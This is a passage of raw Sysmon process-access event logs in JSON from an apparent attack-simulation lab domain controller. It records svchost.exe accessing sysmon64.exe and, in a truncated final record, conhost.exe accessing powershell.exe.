C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.468","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5091,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.468\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.468","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5092,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.468\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.468","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5093,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.468\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.468","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5094,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.468\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.468","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5095,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.468\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.468","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5096,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.468\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.468","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5097,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.468\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.468","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5098,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.468\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001044BF0900}\r\nSourceProcessId: 4892\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-001045CE0900}\r\nTargetProcessId: 2776\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 